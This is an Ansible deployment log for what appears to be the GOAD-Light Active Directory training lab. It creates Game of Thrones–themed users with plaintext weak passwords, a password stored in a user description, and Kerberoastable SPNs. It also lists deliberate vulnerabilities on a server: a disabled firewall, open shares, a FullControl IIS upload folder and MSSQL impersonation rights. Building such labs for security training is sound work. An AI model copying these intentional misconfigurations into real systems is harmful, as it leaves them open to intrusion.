[started TASK: member_server : Verify File Server Role is installed. on srv02]
TASK [member_server : Verify File Server Role is installed.] ***********************************************************************************************************************************************
changed: [srv02]
[started TASK: member_server : Add member server on srv02]
TASK [member_server : Add member server] *******************************************************************************************************************************************************************
changed: [srv02]
[started TASK: member_server : Reboot if needed on srv02]
TASK [member_server : Reboot if needed] ********************************************************************************************************************************************************************
changed: [srv02]
PLAY [play workstations AD configuration] ******************************************************************************************************************************************************************
skipping: no hosts matched
PLAY RECAP *************************************************************************************************************************************************************************************************
dc01 : ok=6 changed=0 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
dc02 : ok=1 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
srv02 : ok=7 changed=5 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
[*] Run playbook : ad-trusts.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory,
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini
ad-trusts.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions
PLAY [Read data files] *************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
ok: [srv02]
[started TASK: save the Json data to a Variable as a Fact on dc01]
TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
[started TASK: find domain_adapter on dc01]
TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
[started TASK: find nat_adapter on dc01]
TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
[started TASK: find number of interfaces on dc01]
TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: find if two adapters on dc01]
TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: confirm nat_adapter on dc01]
PLAY [Trusts configuration prepare] ************************************************************************************************************************************************************************
skipping: no hosts matched
PLAY [Trusts configuration] ********************************************************************************************************************************************************************************
skipping: no hosts matched
PLAY [Trusts configuration end] ****************************************************************************************************************************************************************************
skipping: no hosts matched
PLAY [Adjust DNS conditional forwarded configuration] ******************************************************************************************************************************************************
skipping: no hosts matched
PLAY RECAP *************************************************************************************************************************************************************************************************
dc01 : ok=6 changed=0 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
dc02 : ok=1 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
srv02 : ok=1 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
[*] Run playbook : ad-data.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory,
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini
ad-data.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions
PLAY [Read data files] *************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc01]
ok: [dc02]
[started TASK: save the Json data to a Variable as a Fact on dc01]
TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
[started TASK: find domain_adapter on dc01]
TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
[started TASK: find nat_adapter on dc01]
TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
[started TASK: find number of interfaces on dc01]
TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: find if two adapters on dc01]
TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: confirm nat_adapter on dc01]
PLAY [DCs AD data configuration] ***************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
[started TASK: password_policy : set password policy on dc01]
[started TASK: password_policy : set password policy on dc02]
TASK [password_policy : set password policy] ***************************************************************************************************************************************************************
changed: [dc02]
changed: [dc01]
[started TASK: ad : Ensure Administrator is part of Domain Admins on dc01]
[started TASK: ad : Ensure Administrator is part of Domain Admins on dc02]
TASK [ad : Ensure Administrator is part of Domain Admins] **************************************************************************************************************************************************
ok: [dc02]
ok: [dc01]
[started TASK: ad : Create OU on dc01]
[started TASK: ad : Create OU on dc02]
TASK [ad : Create OU] **************************************************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'Vale', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'IronIslands', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Riverlands', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Crownlands', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Stormlands', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Westerlands', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Reach', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Dorne', 'value': {'path': 'DC=sevenkingdoms,DC=local'}})
[started TASK: ad : Create Groups Universal on dc01]
[started TASK: ad : Create Groups Universal on dc02]
[started TASK: ad : Create Groups Global on dc01]
[started TASK: ad : Create Groups Global on dc02]
TASK [ad : Create Groups Global] ***************************************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'Lannister', 'value': {'managed_by': 'tywin.lannister', 'path': 'OU=Westerlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'Stark', 'value': {'managed_by': 'eddard.stark', 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Baratheon', 'value': {'managed_by': 'robert.baratheon', 'path': 'OU=Stormlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'Night Watch', 'value': {'managed_by': 'jeor.mormont', 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Small Council', 'value': {'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'Mormont', 'value': {'managed_by': 'jeor.mormont', 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'DragonStone', 'value': {'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'KingsGuard', 'value': {'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'DragonRider', 'value': {'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
[started TASK: ad : Create Groups domainlocal on dc01]
[started TASK: ad : Create Groups domainlocal on dc02]
TASK [ad : Create Groups domainlocal] **********************************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'AcrossTheNarrowSea', 'value': {'path': 'CN=Users,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'AcrossTheSea', 'value': {'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
[started TASK: ad : Sync the contents of one directory to another - hack to get Requires -Module Ansible.ModuleUtils.Legacy loaded on dc01]
[started TASK: ad : Sync the contents of one directory to another - hack to get Requires -Module Ansible.ModuleUtils.Legacy loaded on dc02]
TASK [ad : Sync the contents of one directory to another - hack to get Requires -Module Ansible.ModuleUtils.Legacy loaded] *********************************************************************************
ok: [dc01]
ok: [dc02]
[started TASK: ad : Create users on dc01]
[started TASK: ad : Create users on dc02]
TASK [ad : Create users] ***********************************************************************************************************************************************************************************
changed: [dc01] => (item={'key': 'tywin.lannister', 'value': {'firstname': 'Tywin', 'surname': 'Lanister', 'password': 'powerkingftw135', 'city': 'Casterly Rock', 'description': 'Tywin Lanister', 'groups': ['Lannister'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'arya.stark', 'value': {'firstname': 'Arya', 'surname': 'Stark', 'password': 'Needle', 'city': 'Winterfell', 'description': 'Arya Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'jaime.lannister', 'value': {'firstname': 'Jaime', 'surname': 'Lanister', 'password': 'cersei', 'city': "King's Landing", 'description': 'Jaime Lanister', 'groups': ['Lannister'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'eddard.stark', 'value': {'firstname': 'Eddard', 'surname': 'Stark', 'password': 'FightP3aceAndHonor!', 'city': "King's Landing", 'description': 'Eddard Stark', 'groups': ['Stark', 'Domain Admins'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'cersei.lannister', 'value': {'firstname': 'Cersei', 'surname': 'Lanister', 'password': 'il0vejaime', 'city': "King's Landing", 'description': 'Cersei Lanister', 'groups': ['Lannister', 'Baratheon', 'Domain Admins', 'Small Council'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'catelyn.stark', 'value': {'firstname': 'Catelyn', 'surname': 'Stark', 'password': 'robbsansabradonaryarickon', 'city': "King's Landing", 'description': 'Catelyn Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'tyron.lannister', 'value': {'firstname': 'Tyron', 'surname': 'Lanister', 'password': 'Alc00L&S3x', 'city': "King's Landing", 'description': 'Tyron Lanister', 'groups': ['Lannister'], 'path': 'OU=Westerlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'robb.stark', 'value': {'firstname': 'Robb', 'surname': 'Stark', 'password': 'sexywolfy', 'city': 'Winterfell', 'description': 'Robb Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'robert.baratheon', 'value': {'firstname': 'Robert', 'surname': 'Baratheon', 'password': 'iamthekingoftheworld', 'city': "King's Landing", 'description': 'Robert Lanister', 'groups': ['Baratheon', 'Domain Admins', 'Small Council', 'Protected Users'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'sansa.stark', 'value': {'firstname': 'Sansa', 'surname': 'Stark', 'password': '345ertdfg', 'city': 'Winterfell', 'description': 'Sansa Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local', 'spns': ['HTTP/eyrie.north.sevenkingdoms.local']}})
changed: [dc01] => (item={'key': 'joffrey.baratheon', 'value': {'firstname': 'Joffrey', 'surname': 'Baratheon', 'password': '1killerlion', 'city': "King's Landing", 'description': 'Joffrey Baratheon', 'groups': ['Baratheon', 'Lannister'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'brandon.stark', 'value': {'firstname': 'Brandon', 'surname': 'Stark', 'password': 'iseedeadpeople', 'city': 'Winterfell', 'description': 'Brandon Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'renly.baratheon', 'value': {'firstname': 'Renly', 'surname': 'Baratheon', 'password': 'lorastyrell', 'city': "King's Landing", 'description': 'Renly Baratheon', 'groups': ['Baratheon', 'Small Council'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'rickon.stark', 'value': {'firstname': 'Rickon', 'surname': 'Stark', 'password': 'Winter2022', 'city': 'Winterfell', 'description': 'Rickon Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'stannis.baratheon', 'value': {'firstname': 'Stannis', 'surname': 'Baratheon', 'password': 'Drag0nst0ne', 'city': "King's Landing", 'description': 'Stannis Baratheon', 'groups': ['Baratheon', 'Small Council'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'hodor', 'value': {'firstname': 'hodor', 'surname': 'hodor', 'password': 'hodor', 'city': 'Winterfell', 'description': 'Brainless Giant', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'petyer.baelish', 'value': {'firstname': 'Petyer', 'surname': 'Baelish', 'password': '@littlefinger@', 'city': "King's Landing", 'description': 'Petyer Baelish', 'groups': ['Small Council'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'jon.snow', 'value': {'firstname': 'Jon', 'surname': 'Snow', 'password': 'iknownothing', 'city': 'Castel Black', 'description': 'Jon Snow', 'groups': ['Stark', 'Night Watch'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local', 'spns': ['HTTP/thewall.north.sevenkingdoms.local']}})
changed: [dc01] => (item={'key': 'lord.varys', 'value': {'firstname': 'Lord', 'surname': 'Varys', 'password': '_W1sper_$', 'city': "King's Landing", 'description': 'Lord Varys', 'groups': ['Small Council'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'samwell.tarly', 'value': {'firstname': 'Samwell', 'surname': 'Tarly', 'password': 'Heartsbane', 'city': 'Castel Black', 'description': 'Samwell Tarly (Password : Heartsbane)', 'groups': ['Night Watch'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'maester.pycelle', 'value': {'firstname': 'Maester', 'surname': 'Pycelle', 'password': 'MaesterOfMaesters', 'city': "King's Landing", 'description': 'Maester Pycelle', 'groups': ['Small Council'], 'path': 'OU=Crownlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'jeor.mormont', 'value': {'firstname': 'Jeor', 'surname': 'Mormont', 'password': '_L0ngCl@w_', 'city': 'Castel Black', 'description': 'Jeor Mormont', 'groups': ['Night Watch', 'Mormont'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'sql_svc', 'value': {'firstname': 'sql', 'surname': 'service', 'password': 'YouWillNotKerboroast1ngMeeeeee', 'city': '-', 'description': 'sql service', 'groups': [], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local', 'spns': ['MSSQLSvc/castelblack.north.sevenkingdoms.local:1433', 'MSSQLSvc/castelblack.north.sevenkingdoms.local']}})
[started TASK: ad : Set users SPN lists on dc01]
[started TASK: ad : Set users SPN lists on dc02]
TASK [ad : Set users SPN lists] ****************************************************************************************************************************************************************************
changed: [dc02] => (item={'key': 'sansa.stark', 'value': {'firstname': 'Sansa', 'surname': 'Stark', 'password': '345ertdfg', 'city': 'Winterfell', 'description': 'Sansa Stark', 'groups': ['Stark'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local', 'spns': ['HTTP/eyrie.north.sevenkingdoms.local']}})
changed: [dc02] => (item={'key': 'jon.snow', 'value': {'firstname': 'Jon', 'surname': 'Snow', 'password': 'iknownothing', 'city': 'Castel Black', 'description': 'Jon Snow', 'groups': ['Stark', 'Night Watch'], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local', 'spns': ['HTTP/thewall.north.sevenkingdoms.local']}})
changed: [dc02] => (item={'key': 'sql_svc', 'value': {'firstname': 'sql', 'surname': 'service', 'password': 'YouWillNotKerboroast1ngMeeeeee', 'city': '-', 'description': 'sql service', 'groups': [], 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local', 'spns': ['MSSQLSvc/castelblack.north.sevenkingdoms.local:1433', 'MSSQLSvc/castelblack.north.sevenkingdoms.local']}})
[started TASK: ad : Assign managed_by domainlocal groups on dc01]
[started TASK: ad : Assign managed_by domainlocal groups on dc02]
[started TASK: ad : Assign managed_by universal groups on dc01]
[started TASK: ad : Assign managed_by universal groups on dc02]
[started TASK: ad : Assign managed_by global groups on dc01]
[started TASK: ad : Assign managed_by global groups on dc02]
TASK [ad : Assign managed_by global groups] ****************************************************************************************************************************************************************
changed: [dc02] => (item={'key': 'Stark', 'value': {'managed_by': 'eddard.stark', 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Lannister', 'value': {'managed_by': 'tywin.lannister', 'path': 'OU=Westerlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'Night Watch', 'value': {'managed_by': 'jeor.mormont', 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
changed: [dc01] => (item={'key': 'Baratheon', 'value': {'managed_by': 'robert.baratheon', 'path': 'OU=Stormlands,DC=sevenkingdoms,DC=local'}})
changed: [dc02] => (item={'key': 'Mormont', 'value': {'managed_by': 'jeor.mormont', 'path': 'CN=Users,DC=North,DC=sevenkingdoms,DC=local'}})
[started TASK: ad : Add members to the Universal group, preserving existing membership on dc01]
[started TASK: ad : Add members to the Universal group, preserving existing membership on dc02]
[started TASK: ad : Add members to the Global group, preserving existing membership on dc01]
[started TASK: ad : Add members to the Global group, preserving existing membership on dc02]
[started TASK: ad : Add members to the Domainlocal group, preserving existing membership on dc01]
[started TASK: ad : Add members to the Domainlocal group, preserving existing membership on dc02]
PLAY [Servers AD data configuration] ***********************************************************************************************************************************************************************
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
[started TASK: settings/copy_files : Create directory on srv02]
TASK [settings/copy_files : Create directory] **************************************************************************************************************************************************************
ok: [srv02]
[started TASK: settings/copy_files : Download GOAD img in C:\tmp on srv02]
TASK [settings/copy_files : Download GOAD img in C:\tmp] ***************************************************************************************************************************************************
changed: [srv02]
PLAY [Move to OU] ******************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc01]
ok: [dc02]
[started TASK: move_to_ou : Move computer to OU on dc01]
[started TASK: move_to_ou : Move computer to OU on dc02]
TASK [move_to_ou : Move computer to OU] ********************************************************************************************************************************************************************
ok: [dc02] => (item={'key': 'srv02', 'value': {'hostname': 'castelblack', 'type': 'server', 'local_admin_password': 'NgtI75cKV+Pu', 'domain': 'north.sevenkingdoms.local', 'path': 'DC=north,DC=sevenkingdoms,DC=local', 'use_laps': False, 'local_groups': {'Administrators': ['north\\jeor.mormont'], 'Remote Desktop Users': ['north\\Night Watch', 'north\\Mormont', 'north\\Stark']}, 'scripts': [], 'vulns': ['directory', 'disable_firewall', 'openshares', 'files', 'permissions'], 'vulns_vars': {'directory': {'shares': 'C:\\shares', 'all': 'C:\\shares\\all'}, 'files': {'website': {'src': 'srv02/wwwroot', 'dest': 'C:\\inetpub\\'}, 'letter_in_shares': {'src': 'srv02/all/arya.txt', 'dest': 'C:\\shares\\all\\arya.txt'}}, 'permissions': {'IIS_IUSRS_upload': {'path': 'C:\\inetpub\\wwwroot\\upload', 'user': 'IIS_IUSRS', 'rights': 'FullControl'}}}, 'mssql': {'sa_password': 'Sup1_sa_P@ssw0rd!', 'svcaccount': 'sql_svc', 'sysadmins': ['NORTH\\jon.snow'], 'executeaslogin': {'NORTH\\samwell.tarly': 'sa', 'NORTH\\brandon.stark': 'NORTH\\jon.snow'}, 'executeasuser': {'arya_master_dbo': {'user': 'NORTH\\arya.stark', 'db': 'master', 'impersonate': 'dbo'}, 'arya_dbms_dbo': {'user': 'NORTH\\arya.stark', 'db': 'msdb', 'impersonate': 'dbo'}}}}})
PLAY RECAP *************************************************************************************************************************************************************************************************
dc01 : ok=16 changed=6 unreachable=0 failed=0 skipped=9 rescued=0 ignored=0
dc02 : ok=12 changed=6 unreachable=0 failed=0 skipped=7 rescued=0 ignored=0
srv02 : ok=4 changed=1 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
[*] Run playbook : ad-gmsa.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory,
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini
ad-gmsa.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions
PLAY [Read data files] *************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
[started TASK: save the Json data to a Variable as a Fact on dc01]
TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
[started TASK: find domain_adapter on dc01]
TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
[started TASK: find nat_adapter on dc01]
TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
[started TASK: find number of interfaces on dc01]
TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: find if two adapters on dc01]
TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: confirm nat_adapter on dc01]
PLAY [GMSA inside AD] **************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [dc02]
ok: [dc01]
[started TASK: gmsa : Create GMSA Account on dc01]
[started TASK: gmsa : Create GMSA Account on dc02]
PLAY [GMSA hosts] ******************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
[started TASK: gmsa_hosts : Install-WindowsFeature RSAT-AD-PowerShell on srv02]
[started TASK: gmsa_hosts : Install ADServiceAccount on srv02]
PLAY RECAP *************************************************************************************************************************************************************************************************
dc01 : ok=7 changed=0 unreachable=0 failed=0 skipped=2 rescued=0 ignored=0
dc02 : ok=2 changed=0 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
srv02 : ok=2 changed=0 unreachable=0 failed=0 skipped=2 rescued=0 ignored=0
[*] Run playbook : laps.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory, /home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini laps.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions
PLAY [Read data files] *************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc01]
ok: [dc02]
[started TASK: save the Json data to a Variable as a Fact on dc01]
TASK [save the Json data to a Variable as a Fact] **********************************************************************************************************************************************************
ok: [dc01]
[started TASK: find domain_adapter on dc01]
TASK [find domain_adapter] *********************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': None, 'connection_name': 'Ethernet 2', 'default_gateway': None, 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter #2', 'ipv6': {'address': 'fe80::e990:f5d4:39ba:4f6b%7', 'prefix': '64'}, 'macaddress': '08:00:27:F7:EA:5F', 'speed': 1000, 'interface_index': 7, 'ipv4': {'address': '192.168.56.10', 'prefix': '24'}})
[started TASK: find nat_adapter on dc01]
TASK [find nat_adapter] ************************************************************************************************************************************************************************************
ok: [dc01] => (item={'dns_domain': 'home', 'connection_name': 'Ethernet', 'default_gateway': 'fe80::2%6', 'mtu': 1500, 'interface_name': 'Intel(R) PRO/1000 MT Desktop Adapter', 'ipv6': [{'address': 'fd17:625c:f037:2:a847:4c4e:e612:2c3c', 'prefix': '64'}, {'address': 'fe80::a847:4c4e:e612:2c3c%6', 'prefix': '64'}], 'macaddress': '08:00:27:7A:A2:FC', 'speed': 1000, 'interface_index': 6, 'ipv4': {'address': '10.0.2.15', 'prefix': '24'}})
[started TASK: find number of interfaces on dc01]
TASK [find number of interfaces] ***************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: find if two adapters on dc01]
TASK [find if two adapters] ********************************************************************************************************************************************************************************
ok: [dc01]
[started TASK: confirm nat_adapter on dc01]
PLAY [configure laps on DCs] *******************************************************************************************************************************************************************************
skipping: no hosts matched
PLAY [configure laps on servers] ***************************************************************************************************************************************************************************
skipping: no hosts matched
PLAY [verify and show laps passwords] **********************************************************************************************************************************************************************
skipping: no hosts matched
PLAY [set laps users and groups permission] ****************************************************************************************************************************************************************
skipping: no hosts matched
PLAY RECAP *************************************************************************************************************************************************************************************************
dc01 : ok=6 changed=0 unreachable=0 failed=0 skipped=1 rescued=0 ignored=0
dc02 : ok=1 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
srv02 : ok=1 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0
[*] Run playbook : ad-relations.yml with inventory file(s) : /home/bolke/GOAD/ad/GOAD-Light/data/inventory, /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory,
/home/bolke/GOAD/globalsettings.ini
[*] CWD: /ansible/
[*] Running command : ansible-playbook -i /home/bolke/GOAD/ad/GOAD-Light/data/inventory -i /home/bolke/GOAD/workspace/850bec-goad-light-virtualbox/inventory -i /home/bolke/GOAD/globalsettings.ini
ad-relations.yml
[WARNING]: Could not match supplied host pattern, ignoring: extensions
PLAY [Read data files] *************************************************************************************************************************************************************************************
[started TASK: Gathering Facts on dc01]
[started TASK: Gathering Facts on dc02]
[started TASK: Gathering Facts on srv02]
TASK [Gathering Facts] *************************************************************************************************************************************************************************************
ok: [srv02]
ok: [dc02]
ok: [dc01]
[started TASK: save the Json data to a Variable as a Fact on dc01]
